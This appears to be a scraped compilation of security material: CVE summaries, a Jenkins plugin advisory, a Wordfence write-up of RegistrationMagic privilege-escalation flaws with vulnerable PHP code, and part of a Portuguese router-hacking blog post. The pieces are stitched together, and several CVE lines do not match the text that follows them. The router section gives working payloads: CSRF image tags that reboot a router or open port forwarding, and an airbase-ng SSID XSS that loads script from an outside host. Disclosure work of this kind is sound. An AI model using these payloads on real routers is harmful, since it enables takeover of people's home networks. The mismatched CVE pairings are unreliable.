CSRF in admin/edit-comments.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to edit a comment, given the id, via a crafted request.

March 19, 2019

**Analyzing PHPKB v9: Part one**

The first part of a series where I will talk about vulnerabilities found in a knowledge-base software written in PHP. Vulnerabilities analyzed: Arbitrary File Download, Remote Code Execution, Blind Cross-Site Scripting, Arbitrary File Renaming, Arbitrary Folder Deletion, CSV Injection, Arbitrary File Listing.

CVE-2020-10504: Home

CSRF in admin/manage-comments.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to disapprove any comment, given the id, via a crafted request.

CVE-2020-10503: Home

CSRF in admin/manage-settings.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to change the global settings, potentially gaining code execution or causing a denial of service, via a crafted request.

CVE-2020-10478: Home

CSRF in admin/add-news.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new news article via a crafted request.

CVE-2020-10479: Home

CSRF in admin/add-glossary.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new glossary term via a crafted request.

CVE-2020-10481: Home

CSRF in admin/add-category.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new category via a crafted request.

CVE-2020-10480: Home

Jenkins Timestamper Plugin 1.11.1 and earlier does not sanitize HTML formatting of its output, resulting in a stored XSS vulnerability exploitable by attackers with Overall/Administer permission.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Audit Trail Plugin
*   Backlog Plugin
*   Cobertura Plugin
*   CryptoMove Plugin
*   DeployHub Plugin
*   Git Plugin
*   Literate Plugin
*   Logstash Plugin
*   Mac Plugin
*   OpenShift Deployer Plugin
*   P4 Plugin
*   Quality Gates Plugin
*   Repository Connector Plugin
*   Rundeck Plugin
*   Script Security Plugin
*   Skytap Cloud CI Plugin
*   Sonar Quality Gates Plugin
*   Subversion Release Manager Plugin
*   Timestamper Plugin
*   Zephyr Enterprise Test Management Plugin
*   Zephyr for JIRA Test Management Plugin

**Descriptions****Sandbox bypass vulnerability in Script Security Plugin**

**SECURITY-1754 / CVE-2020-2134 (constructors), CVE-2020-2135 (GroovyInterceptable)**  
**Severity (CVSS):** High  
**Affected plugin: script-security**  
**Description:**

Sandbox protection in Script Security Plugin 1.70 and earlier can be circumvented through:

*   Crafted constructor calls and bodies (due to an incomplete fix of SECURITY-582)
    
*   Crafted method calls on objects that implement GroovyInterceptable
    

This allows attackers able to specify and run sandboxed scripts to execute arbitrary code in the context of the Jenkins controller JVM.

Script Security Plugin 1.71 has additional restrictions and sanity checks to ensure that super constructors cannot be constructed without being intercepted by the sandbox. In addition, it also intercepts method calls on objects that implement GroovyInterceptable as calls to GroovyObject#invokeMethod(String, Object), which is on the list of dangerous signatures and should not be approved for use in the sandbox.

**Stored XSS vulnerability in Git Plugin**

**SECURITY-1723 / CVE-2020-2136**  
**Severity (CVSS):** Medium  
**Affected plugin: git**  
**Description:**

Git Plugin 4.2.0 and earlier does not escape the error message for the repository URL for Microsoft TFS field form validation.

This results in a stored cross-site scripting vulnerability that can be exploited by users with Job/Configure permission.

Git Plugin 4.2.1 escapes the affected part of the error message.

**Stored XSS vulnerability in Timestamper Plugin**

**SECURITY-1784 / CVE-2020-2137**  
**Severity (CVSS):** Medium  
**Affected plugin: timestamper**  
**Description:**

Timestamper Plugin 1.11.1 and earlier does not escape or sanitize the HTML formatting used to display the timestamps in console output for builds.

This results in a stored cross-site scripting vulnerability that can be exploited by users with Overall/Administer permission.

Timestamper Plugin 1.11.2 sanitizes the HTML formatting for timestamps and only allows basic, safe HTML formatting.

**XXE vulnerability in Cobertura Plugin**

**SECURITY-1700 / CVE-2020-2138**  
**Severity (CVSS):** High  
**Affected plugin: cobertura**  
**Description:**

Cobertura Plugin 1.15 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows a user able to control the input files for the 'Publish Cobertura Coverage Report' post-build step to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

Cobertura Plugin 1.16 disables external entity resolution for its XML parser.

**Arbitrary file write vulnerability in Cobertura Plugin**

**SECURITY-1668 / CVE-2020-2139**  
**Severity (CVSS):** Medium  
**Affected plugin: cobertura**  
**Description:**

Cobertura Plugin 1.15 and earlier does not validate file paths from the XML file it parses.

This allows attackers able to control the coverage report content to overwrite any file on the Jenkins controller file system.

Cobertura Plugin 1.16 sanitizes the file paths to prevent escape from the base directory.

**XSS vulnerability in Audit Trail Plugin**

**SECURITY-1722 / CVE-2020-2140**  
**Severity (CVSS):** Medium  
**Affected plugin: audit-trail**  
**Description:**

Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation.

This results in a reflected cross-site scripting vulnerability that can also be exploited similar to a stored cross-site scripting vulnerability by users with Overall/Administer permission.

Audit Trail Plugin 3.3 escapes the affected part of the error message.

**CSRF vulnerability and missing permission checks in P4 Plugin**

**SECURITY-1765 / CVE-2020-2141 (CSRF), CVE-2020-2142 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: p4**  
**Description:**

P4 Plugin 1.10.10 and earlier does not perform permission checks in several HTTP endpoints. This allows users with Overall/Read access to trigger builds or add labels in the Perforce repository.

Additionally, these endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

P4 Plugin 1.10.11 requires POST requests and appropriate user permissions for the affected HTTP endpoints.

**Credentials transmitted in plain text by Logstash Plugin**

**SECURITY-1516 / CVE-2020-2143**  
**Severity (CVSS):** Low  
**Affected plugin: logstash**  
**Description:**

Logstash Plugin stores credentials in its global configuration file jenkins.plugins.logstash.LogstashConfiguration.xml on the Jenkins controller as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by Logstash Plugin 2.3.1 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

Logstash Plugin 2.3.2 transmits the credentials in its global configuration encrypted.

**XXE vulnerability in Rundeck Plugin**

**SECURITY-1702 / CVE-2020-2144**  
**Severity (CVSS):** High  
**Affected plugin: rundeck**  
**Description:**

Rundeck Plugin 3.6.6 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows a user with Overall/Read access to have Jenkins parse a crafted HTTP request with XML data that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

Rundeck Plugin 3.6.7 disables external entity resolution for its XML parser.

**Credentials stored in plain text by Zephyr Enterprise Test Management Plugin**

**SECURITY-1596 / CVE-2020-2145**  
**Severity (CVSS):** Low  
**Affected plugin: zephyr-enterprise-test-management**  
**Description:**

Zephyr Enterprise Test Management Plugin 1.9.1 and earlier stores its Zephyr password in plain text in the global configuration file com.thed.zephyr.jenkins.reporter.ZeeReporter.xml. This password can be viewed by users with access to the Jenkins controller file system.

Zephyr Enterprise Test Management Plugin 1.10 integrates with Credentials Plugin.

**Missing SSH host key validation in Mac Plugin**

**SECURITY-1692 / CVE-2020-2146**  
**Severity (CVSS):** Medium  
**Affected plugin: mac**  
**Description:**

Mac Plugin 1.1.0 and earlier does not use SSH host key validation when connecting to Mac Cloud host launched by the plugin. This lack of validation could be abused using a man-in-the-middle attack to intercept these connections to build agents.

Mac Plugin 1.2.0 validates SSH host keys when connecting to agents.

**CSRF vulnerability and missing permission checks in Mac Plugin**

**SECURITY-1761 / CVE-2020-2147 (CSRF), CVE-2020-2148 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: mac**  
**Description:**

Mac Plugin 1.1.0 and earlier does not perform permission checks on a method implementing form validation. This allows users with Overall/Read access to Jenkins to connect to an attacker-specified SSH host using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

This form validation method requires POST requests and Overall/Administer permission in Mac Plugin 1.2.0.

**Credentials transmitted in plain text by Repository Connector Plugin**

**SECURITY-1520 / CVE-2020-2149**  
**Severity (CVSS):** Low  
**Affected plugin: repository-connector**  
**Description:**

Repository Connector Plugin stores credentials in its global configuration file org.jvnet.hudson.plugins.repositoryconnector.RepositoryConfiguration.xml on the Jenkins controller as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by Repository Connector Plugin 1.2.6 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**Credentials transmitted in plain text by Sonar Quality Gates Plugin**

**SECURITY-1523 / CVE-2020-2150**  
**Severity (CVSS):** Low  
**Affected plugin: sonar-quality-gates**  
**Description:**

Sonar Quality Gates Plugin stores credentials in its global configuration file org.quality.gates.jenkins.plugin.GlobalConfig.xml on the Jenkins controller as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by Sonar Quality Gates Plugin 1.3.1 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**Credentials transmitted in plain text by Quality Gates Plugin**

**SECURITY-1519 / CVE-2020-2151**  
**Severity (CVSS):** Low  
**Affected plugin: quality-gates**  
**Description:**

Quality Gates Plugin stores credentials in its global configuration file quality.gates.jenkins.plugin.GlobalConfig.xml on the Jenkins controller as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by Quality Gates Plugin 2.5 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**XSS vulnerability in Subversion Release Manager Plugin**

**SECURITY-1727 / CVE-2020-2152**  
**Severity (CVSS):** Medium  
**Affected plugin: svn-release-mgr**  
**Description:**

Subversion Release Manager Plugin 1.2 and earlier does not escape the error message for the Repository URL field form validation.

This results in a reflected cross-site scripting vulnerability that can also be exploited similar to a stored cross-site scripting vulnerability by users with Job/Configure permission.

As of publication of this advisory, there is no fix.

**Credentials transmitted in plain text by Backlog Plugin**

**SECURITY-1510 / CVE-2020-2153**  
**Severity (CVSS):** Low  
**Affected plugin: backlog**  
**Description:**

Backlog Plugin stores credentials in job config.xml files as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by Backlog Plugin 2.4 and earlier. These credentials could be viewed by users with Extended Read permission.

As of publication of this advisory, there is no fix.

**Credentials stored in plain text by Zephyr for JIRA Test Management Plugin**

**SECURITY-1550 / CVE-2020-2154**  
**Severity (CVSS):** Low  
**Affected plugin: zephyr-for-jira-test-management**  
**Description:**

Zephyr for JIRA Test Management Plugin 1.5 and earlier stores Jira credentials unencrypted in its global configuration file com.thed.zephyr.jenkins.reporter.ZfjReporter.xml on the Jenkins controller. These credentials can be viewed by users with access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Credentials transmitted in plain text by OpenShift Deployer Plugin**

**SECURITY-1518 / CVE-2020-2155**  
**Severity (CVSS):** Low  
**Affected plugin: openshift-deployer**  
**Description:**

OpenShift Deployer Plugin stores credentials in its global configuration file org.jenkinsci.plugins.openshift.DeployApplication.xml on the Jenkins controller as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by OpenShift Deployer Plugin 1.2.0 and earlier. This can result in exposure of the credential through browser extensions, cross-site scripting vulnerabilities, and similar situations.

As of publication of this advisory, there is no fix.

**Credentials transmitted in plain text by DeployHub Plugin**

**SECURITY-1511 / CVE-2020-2156**  
**Severity (CVSS):** Low  
**Affected plugin: deployhub**  
**Description:**

DeployHub Plugin stores credentials in job config.xml files as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by DeployHub Plugin 8.0.14 and earlier. These credentials could be viewed by users with Extended Read permission.

As of publication of this advisory, there is no fix.

**Credentials transmitted in plain text by Skytap Cloud CI Plugin**

**SECURITY-1522 / CVE-2020-2157**  
**Severity (CVSS):** Low  
**Affected plugin: skytap**  
**Description:**

Skytap Cloud CI Plugin stores credentials in job config.xml files as part of its configuration.

While the credentials are stored encrypted on disk, they are transmitted in plain text as part of the configuration form by Skytap Cloud CI Plugin 2.07 and earlier. These credentials could be viewed by users with Extended Read permission.

As of publication of this advisory, there is no fix.

**RCE vulnerability in Literate Plugin**

**SECURITY-1750 / CVE-2020-2158**  
**Severity (CVSS):** High  
**Affected plugin: literate**  
**Description:**

Literate Plugin 1.0 and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types. This results in a remote code execution vulnerability exploitable by users able to provide YAML input files to Literate Plugin’s build step.

As of publication of this advisory, there is no fix.

**OS command injection in CryptoMove Plugin**

**SECURITY-1635 / CVE-2020-2159**  
**Severity (CVSS):** High  
**Affected plugin: cryptomove**  
**Description:**

CryptoMove Plugin 0.1.33 and earlier allows the configuration of an OS command to execute as part of its build step configuration.

This command will be executed on the Jenkins controller as the OS user account running Jenkins, allowing user with Job/Configure permission to execute an arbitrary OS command on the Jenkins controller.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-1510: Low
*   SECURITY-1511: Low
*   SECURITY-1516: Low
*   SECURITY-1518: Low
*   SECURITY-1519: Low
*   SECURITY-1520: Low
*   SECURITY-1522: Low
*   SECURITY-1523: Low
*   SECURITY-1550: Low
*   SECURITY-1596: Low
*   SECURITY-1635: High
*   SECURITY-1668: Medium
*   SECURITY-1692: Medium
*   SECURITY-1700: High
*   SECURITY-1702: High
*   SECURITY-1722: Medium
*   SECURITY-1723: Medium
*   SECURITY-1727: Medium
*   SECURITY-1750: High
*   SECURITY-1754: High
*   SECURITY-1761: Medium
*   SECURITY-1765: Medium
*   SECURITY-1784: Medium

**Affected Versions**

*   **Audit Trail Plugin** up to and including 3.2
*   **Backlog Plugin** up to and including 2.4
*   **Cobertura Plugin** up to and including 1.15
*   **CryptoMove Plugin** up to and including 0.1.33
*   **DeployHub Plugin** up to and including 8.0.14
*   **Git Plugin** up to and including 4.2.0
*   **Literate Plugin** up to and including 1.0
*   **Logstash Plugin** up to and including 2.3.1
*   **Mac Plugin** up to and including 1.1.0
*   **OpenShift Deployer Plugin** up to and including 1.2.0
*   **P4 Plugin** up to and including 1.10.10
*   **Quality Gates Plugin** up to and including 2.5
*   **Repository Connector Plugin** up to and including 1.2.6
*   **Rundeck Plugin** up to and including 3.6.6
*   **Script Security Plugin** up to and including 1.70
*   **Skytap Cloud CI Plugin** up to and including 2.07
*   **Sonar Quality Gates Plugin** up to and including 1.3.1
*   **Subversion Release Manager Plugin** up to and including 1.2
*   **Timestamper Plugin** up to and including 1.11.1
*   **Zephyr Enterprise Test Management Plugin** up to and including 1.9.1
*   **Zephyr for JIRA Test Management Plugin** up to and including 1.5

**Fix**

*   **Audit Trail Plugin** should be updated to version 3.3
*   **Cobertura Plugin** should be updated to version 1.16
*   **Git Plugin** should be updated to version 4.2.1
*   **Logstash Plugin** should be updated to version 2.3.2
*   **Mac Plugin** should be updated to version 1.2.0
*   **P4 Plugin** should be updated to version 1.10.11
*   **Rundeck Plugin** should be updated to version 3.6.7
*   **Script Security Plugin** should be updated to version 1.71
*   **Timestamper Plugin** should be updated to version 1.11.2
*   **Zephyr Enterprise Test Management Plugin** should be updated to version 1.10

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Backlog Plugin
*   CryptoMove Plugin
*   DeployHub Plugin
*   Literate Plugin
*   OpenShift Deployer Plugin
*   Quality Gates Plugin
*   Repository Connector Plugin
*   Skytap Cloud CI Plugin
*   Sonar Quality Gates Plugin
*   Subversion Release Manager Plugin
*   Zephyr for JIRA Test Management Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Cheng Gao, Alibaba Cloud Intelligence Security Team, https://www.aliyun.com/** for SECURITY-1702
*   **Federico Pellegrin** for SECURITY-1668, SECURITY-1700
*   **Ian Williams** for SECURITY-1596
*   **James Holderness, IB Boost** for SECURITY-1510, SECURITY-1511, SECURITY-1516, SECURITY-1518, SECURITY-1519, SECURITY-1520, SECURITY-1522, SECURITY-1523, SECURITY-1550
*   **Nils Emmerich of ERNW Research GmbH** for SECURITY-1754
*   **Raihaan Shouhell, Autodesk, Inc** for SECURITY-1692
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-1722, SECURITY-1723, SECURITY-1727, SECURITY-1761, SECURITY-1765, SECURITY-1784
*   **Wasin Saengow** for SECURITY-1635

CVE-2020-2137: Jenkins Security Advisory 2020-03-09

Jenkins CryptoMove Plugin 0.1.33 and earlier allows attackers with Job/Configure access to execute arbitrary OS commands on the Jenkins master as the OS user account running Jenkins.

CVE-2020-2159: Jenkins Security Advisory 2020-03-09

In the RegistrationMagic plugin through 4.6.0.3 for WordPress, the export function allows remote authenticated users (with minimal privileges) to export submitted form data and settings via class_rm_form_controller.php rm_form_export.

On February 24th, our Threat Intelligence team discovered several critical vulnerabilities in RegistrationMagic, a WordPress plugin installed on over 10,000 sites, _including the vendor’s own site_.

These allowed an attacker with subscriber-level permissions to elevate their account’s privileges to those of an administrator and to export every form on the site, including all the data that had been submitted to them in the past. Additionally, through a number of unprotected AJAX actions, an attacker with subscriber-level permissions could send arbitrary emails, import a custom vulnerable form, replace an existing form with their uploaded form, and use the vulnerable form to register a new administrative user. Finally, none of the administrative functions used by the plugin included nonce checks, making the plugin vulnerable to cross-site request forgery (CSRF) attacks – it was possible for an attacker to forge requests on behalf of an administrator to update any of the plugin’s settings.

We privately disclosed these issues to the plugin’s author, who released a patch 2 days after receiving our full report. Wordfence Premium users received a new firewall rule on February 25th to protect against exploits targeting these vulnerabilities. Free Wordfence users will receive this rule on March 26, 2020.

**Description**: Authenticated Privilege Escalation  
**Affected Plugin**: RegistrationMagic – Custom Registration Forms and User Login  
**Plugin Slug**: custom-registration-form-builder-with-submission-manager  
**Affected Versions**: <= 4.6.0.3  
**CVE ID**: CVE-2020-9456  
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H  
**CVSS Score**: 9.9(Critical)  
**Patched Version**: 4.6.0.4

The RegistrationMagic plugin allows WordPress users to create customized registration forms, track registration submissions, manage users, analyze stats and assign user roles, as well as accept payments.

While quite powerful, there are a number of functions in the plugin used for administrative purposes that are not protected by capability checks or nonces, all of which are processed using custom forms generated by the plugin. Additionally, the plugin automatically creates and publishes a page upon activation, accessible to subscribers at /rm\_submissions. This page is intended to allow users to view their previous form submissions, but it could also be used to render and process forms that were only intended to be accessed by administrators. Sending a request to this page with the ‘rm\_slug’ $\_POST parameter set to ‘rm\_user\_edit’ and the ‘user\_id’ parameter set to the user’s ID (which can typically be obtained from the user’s profile page) caused the plugin to generate a form which could be used to change the user’s role to administrator. Unfortunately, this form didn’t use a capability check or a nonce, so it could be used by a subscriber to update their own role to administrator.

    public function edit($model, RM\_User\_Services $service, $request, $params)
    {
        if (isset($request->req\['user\_id'\]))
        {
            if ($this->mv\_handler->validateForm("rm\_edit\_user"))
            {
                if (isset($request->req\['user\_password'\]) && isset($request->req\['user\_password\_conf'\]))
                {
                    if ($request->req\['user\_password'\] && $request->req\['user\_password\_conf'\] && $request->req\['user\_id'\])
                        $service->reset\_user\_password($request->req\['user\_password'\], $request->req\['user\_password\_conf'\], $request->req\['user\_id'\]);
                    $service->set\_user\_role($request->req\['user\_id'\], $request->req\['user\_role'\]);

**Description**: CSRF to Settings Modification  
**Affected Plugin**: RegistrationMagic – Custom Registration Forms and User Login  
**Plugin Slug**: custom-registration-form-builder-with-submission-manager  
**Affected Versions**: <= 4.6.0.3  
**CVE ID**: CVE-2020-9454  
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H  
**CVSS Score**: 8.0(High)  
**Patched Version**: 4.6.0.4

Not only did the RegistrationMagic plugin fail to check nonces in the previously mentioned vulnerability, it actually did not check nonces for _any_ of its functionality, including the forms used to save changes to the plugin settings. As such it was possible for an attacker to forge a crafted request on behalf of a site administrator in order to modify the plugin’s settings, which included the ability to delete existing users or add new user roles. It could even be used to allow forms to accept php files, which could then be used to upload a backdoor which could allow an attacker full control over the WordPress site.

**Description**: Authenticated Email Injection  
**Affected Plugin**: RegistrationMagic – Custom Registration Forms and User Login  
**Plugin Slug**: custom-registration-form-builder-with-submission-manager  
**Affected Versions**: <= 4.6.0.3  
**CVE ID**: CVE-2020-9455  
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N  
**CVSS Score**: 6.4(Medium)  
**Patched Version**: 4.6.0.4

In addition to allowing a subscriber to elevate their privileges, the RegistrationMagic plugin also allowed a subscriber to send emails from the site to any email address, with a subject and body of their choice. This could be used to send spam, but this flaw would also make tricking a site  administrator into clicking a link in order to perform a CSRF attack much easier. This functionality actually used an unprotected AJAX action, which is an extremely common attack vector in WordPress. Although it was only available to subscribers, much of the plugin’s functionality was geared towards an improved user experience for subscribers, so this was a surprising oversight.

$this->loader->add\_action('wp\_ajax\_send\_email\_user\_view', new RM\_User\_Services(), 'send\_email\_ajax');

    public static function send\_email\_ajax()
    {
        $to = $\_POST\['to'\];
        $sub = $\_POST\['sub'\];
        $body = $\_POST\['body'\];
        
        RM\_Utilities::quick\_email($to, $sub, $body);
        
        wp\_die();
    }

As you can see, the ‘send\_email\_ajax’ function doesn’t use any capability or nonce checks, so any logged-in user could use it to send email from the site.

**Description**: Authenticated Settings and User Data Export  
**Affected Plugin**: RegistrationMagic – Custom Registration Forms and User Login  
**Plugin Slug**: custom-registration-form-builder-with-submission-manager  
**Affected Versions**: <= 4.6.0.3  
**CVE ID**: CVE-2020-9458  
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N  
**CVSS Score**: 4.3(Medium)  
**Patched Version**: 4.6.0.4

Using the same /rm\_submissions endpoint as the authenticated privilege escalation vulnerability, a logged-in attacker could also send a request with the ‘rm\_slug’ $\_POST parameter set to ‘rm\_form\_export’, which caused the plugin to export every form on the site, _including everything that had ever been submitted to any of these forms_ (though this did not include login credentials). Again, the export function lacked access control or a nonce check, and in addition to exposing potentially sensitive information, an attacker could use the exported form data to launch yet another type of attack. For those sites with sensitive personally identifiable user information, such as commerce sites, this vulnerability was particularly concerning.

\*The vulnerable function has more than 230 lines of code. For brevity,  we’re not showing it here, but it is available to review in the plugin repository.

**Description**: Authenticated Settings Import -> Privilege Escalation  
**Affected Plugin**: RegistrationMagic – Custom Registration Forms and User Login  
**Plugin Slug**: custom-registration-form-builder-with-submission-manager  
**Affected Versions**: <= 4.6.0.3  
**CVE ID**: CVE-2020-9457  
**CVSS Vector**: CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H  
**CVSS Score**: 8.0(High)  
**Patched Version**: 4.6.0.4

There was one more method an attacker could use to create an administrator, though it took a bit more work and a few more steps. One of the more advanced features of the RegistrationMagic plugin allowed the creation of forms that saved user-submitted content directly into the usermeta table in the site’s database. While this functionality was intended to store additional metadata about the user, this table is _also_ used to store a user’s permissions, using the wp\_user\_level and wp\_capabilities keys, and a custom form could be created to modify the contents of these keys. Another advanced feature was the ability to make forms “expire” after a certain date or number of submissions, and to automatically substitute a different form at that time.

Unfortunately, thanks to more unprotected AJAX actions, an attacker could upload a customized “vulnerable” registration form. They could then use the data export vulnerability to grab the information they needed to launch the next step: by using yet another unprotected AJAX action, they could set an existing form on the site to expire after 0 submissions, and replace it with their newly uploaded form. Once the vulnerable form was active, the attacker could register as an administrator.

If no forms were published, but the plugin’s “Magic Button” functionality was enabled, an attacker could also use an unprotected AJAX action to set their uploaded form as the “Default” form, which could be submitted from anywhere on the site.

The registered AJAX actions:

$this->loader->add\_action('wp\_ajax\_rm\_save\_form\_view\_sett', new RM\_Form\_Settings\_Controller(), 'view');

$this->loader->add\_action('wp\_ajax\_set\_default\_form', 'RM\_Utilities', 'set\_default\_form');

$this->loader->add\_action('wp\_ajax\_import\_first', 'RM\_Services', 'import\_form\_first\_ajax');

$this->loader->add\_action('wp\_ajax\_rm\_admin\_upload\_template', $rm\_admin, 'upload\_template'); 

The vulnerable functions – note the lack of capability checks and nonce checks:

    public function upload\_template(){
       if($\_FILES){
               $name=get\_temp\_dir().'RMagic.xml';
               if(is\_array($\_FILES\['file'\]\['tmp\_name'\]))
               $status= move\_uploaded\_file ( $\_FILES\['file'\]\['tmp\_name'\]\['0'\] , $name );
               else
               $status= move\_uploaded\_file ( $\_FILES\['file'\]\['tmp\_name'\], $name );    
               echo json\_encode(array('success'=>$status));
        }

    public static function import\_form\_first\_ajax() {
        $form\_id = null;
        if (isset($\_POST\['form\_id'\])) {
            $form\_id = $\_POST\['form\_id'\];
        }        
        echo self::import\_form\_first(null, $form\_id);
        wp\_die();
    }

    function view($model=null, $service=null, $request=null, $params=null) {
        if (!$request instanceof RM\_Request) {
            $postdata = file\_get\_contents("php://input");
            $request = json\_decode($postdata);
            if(isset($request->form\_id) && (int)$request->form\_id){
                $model = new RM\_Forms;
                $model->load\_from\_db($request->form\_id);
                $model->set((array)$request);
                $model->update\_into\_db();
                echo 'saved';

    public static function set\_default\_form() {
        if (isset($\_POST\['rm\_def\_form\_id'\])) {
            $gopts = new RM\_Options;
            $gopts->set\_value\_of('default\_form\_id', $\_POST\['rm\_def\_form\_id'\]);
        }
        die;
    }

**Disclosure Timeline**

**February 21, 2020** – Lower-severity vulnerabilities discovered with indications that higher-severity vulnerabilities might be present.  
**February 24, 2020** – Higher-Severity vulnerabilities discovered and analyzed.  
**February 25, 2020** – Firewall rule released for Wordfence Premium users. Initial outreach to plugin vendor.  
**February 26, 2020** – Vendor confirms appropriate inbox for handling discussion. Full disclosure of vulnerabilities is sent.  
**February 28, 2020** – Vendor releases an update patching vulnerabilities.  
**March 26th, 2020** – Firewall rule becomes available to free users.

**Conclusion**

In today’s post, we detailed several vulnerabilities including CSRF, email injection, and privilege escalation found in the RegistrationMagic plugin. These flaws have been patched in version 4.6.0.4, and we recommend that users update to the latest version available immediately. While we have not detected any malicious activity targeting RegistrationMagic, some of these vulnerabilities are severe enough to allow complete site takeover. Sites running Wordfence Premium have been protected from attacks against this vulnerability since February 25th. Sites running the free version of Wordfence will receive the same firewall rule update on March 26th, 2020.

CVE-2020-9458: Multiple Vulnerabilities Patched in RegistrationMagic Plugin

On TP-Link TL-WR849N 0.9.1 4.16 devices, a remote command execution vulnerability in the diagnostics area can be exploited when an attacker sends specific shell metacharacters to the panel's traceroute feature.

Hackers xiaomi e androids, algumas pessoas já vem me pedindo a algum tempo para falar um pouco sobre algumas vulns e exploits para roteadores (acho que é para fins educacionais), então, hoje irei falar sobre algumas vulnerabilidades presentes em alguns modelos de roteadores domésticos, os quais na maioria das vezes seus donos/usuários não se preocupam em manter sua firmware atualizado, também citarei exemplos explicando por que na maioria das vezes manter seu aparelho atualizado ainda poderá deixar passar alguns ataques.

Usarei os roteadores de marcas Intelbras e TP-Link nos exemplos, pois até agora são os únicos que tenho em mãos para realizar os testes, mas acredito que sirva de base para que vocês possam replicar os mesmos bugs em outros modelos.

Começando pelo bom e velho Intelbras, acho que tudo que tem “Intelbras” em seu nome terá esses mesmos bugs, vou citar só alguns exemplos em determinados modelos e versões, mas os bugs foram testados em outros tipos de painéis e na maioria eles estavam lá.

**CSRF****Roteador Wireless N 150 Mbps -WRN 240**

![itb](https://i.imgur.com/Wqpbpj9.png) Atire a senha do Facebook quem nunca viu esse painel na vida.

Acho que essa é a vulnerabilidade mais comum e conhecida nesses roteadores, Cross-site Request Forgery (CSRF ou XSRF), em português falsificação de solicitação entre sites, também conhecido como ataque de um clique.

Para salvar ou alterar alguma informação, seu painel adiciona esses valores em parâmetros em uma URL e faz a requisição via GET, onde essa URL é requisitada através de javascript ou iframe.

**Ex:**

Para reiniciar o roteador, quando vamos lá no menu e clicamos no botão reiniciar, o painel faz a requisição para o endereço: `http://192.168.0.1/userRpm/SysRebootRpm.htm?Reboot=Reiniciar`

![restart](https://i.imgur.com/Uq1aiXb.png)

E então o roteador reinicia.

Poderíamos fazer o mesmo procedimento de uma maneira “escondida” do admin.

    $ echo “<img src=’http://192.168.0.1/userRpm/SysRebootRpm.htm?Reboot=Reiniciar’>” > poc.html
    

![poc](https://i.imgur.com/mBunIIJ.png)

Agora podemos usar para alterar algumas outras informações como, nome da rede wifi, senhas, adicionar portas redirecionadas, mudar DNS etc.

**Video salvo em 02/07/2018**

Também testado no painel do _WRN 150_

![wrn](https://i.imgur.com/xo7Oz5g.png)

**Outro exemplo, agora com o **TP-LINK 150M Wireless N Router Model No. TL-WR740N****

    <img src="http://192.168.0.1/userRpm/VirtualServerRpm.htm?ExPort=22&InPort=22&Ip=192.168.0.100&Protocol=1&State=1&Commonport=0&Changed=0&SelIndex=0&Page=1&Save=Save">
    

**XSS**

Podemos encontrar XSS facilmente em vários inputs, principalmente se juntarmos o CSRF+XSS.

Mas vou mostrar um que achei mais “apresentável” pelo fato de que podemos encontrar o mesmo bug em outros dispositivos além de roteadores.

O XSS por SSID de um outro AP, nos roteadores podemos encontrar esse bug em páginas que mostrem SSID de outras redes, normalmente nas configurações para adicionar um novo “AP”.

Como o painel estará mostrando o nome das outras redes wireless, as vezes ele não filtra esses SSID e com isso conseguimos nosso XXS.

**Ex:**

Subindo nosso payload:

    airbase-ng -e "</script><script src='//elb.me'>" -c 8 -v wlan0mon
    

Conteudo em _elb.me_:

**Resultado:**

![alert](https://i.imgur.com/F12K9wP.png)

Tenho um post sobre isso, explicando mais detalhadamente:

*   XSS NO ROTEADOR INTELBRAS WRN 240

**Auth Bypass: Alterando firmware e configurações sem autenticar no painel**

Primeiro começarei falando de um bug que encontrei num dos roteadores da TP-Link, não vou tomar os créditos para mim pois enquanto pesquisava notei que alguém já tinha reportado os mesmos, só que em outros modelos.

